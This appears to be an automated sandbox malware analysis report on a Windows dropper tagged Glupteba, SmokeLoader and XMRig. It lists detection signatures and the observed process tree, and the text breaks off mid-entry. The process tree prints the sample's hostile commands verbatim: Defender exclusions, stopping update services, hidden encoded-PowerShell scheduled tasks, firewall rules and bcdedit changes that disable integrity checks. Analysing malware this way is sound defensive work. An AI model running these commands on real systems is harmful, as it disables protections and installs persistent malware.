Malware Analysis Report

2025-01-02 08:08

Sample ID 231006-reg95aee62
Target NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe
SHA256 5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08
Tags
fabookie glupteba smokeloader xmrig pub1 backdoor dropper evasion loader miner spyware stealer trojan upx privateloader themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08

Threat Level: Known bad

The file NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba smokeloader xmrig pub1 backdoor dropper evasion loader miner spyware stealer trojan upx privateloader themida

SmokeLoader

Glupteba

Fabookie

Detect Fabookie payload

UAC bypass

PrivateLoader

xmrig

Windows security bypass

Glupteba payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Checks computer location settings

UPX packed file

Windows security modification

Themida packer

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

System policy modification

Runs net.exe

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-06 14:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-06 14:06

Reported

2023-10-06 14:08

Platform

win7-20230831-en

Max time kernel

8s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

"C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe"

C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe

"C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe" --silent --allusers=0

C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

"C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe"

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

"C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe"

C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

"C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe"

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

"C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe"

C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

"C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe"

C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp" /SL4 $301BE "C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe" 2846236 52224

C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

"C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe"

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

"C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe"

C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

"C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ghLKzPDtB" /SC once /ST 04:37:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ghLKzPDtB"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231006140659.log C:\Windows\Logs\CBS\CbsPersist_20231006140659.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {2AFA7E24-E487-4520-ABA3-138F3DAD67B2} S-1-5-21-86725733-3001458681-3405935542-1000:ZWKQHIWB\Admin:Interactive:[1]

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

"C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

"C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ghLKzPDtB"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 14:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe\" F9 /Yosite_idpIV 385120 /S" /V1 /F

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

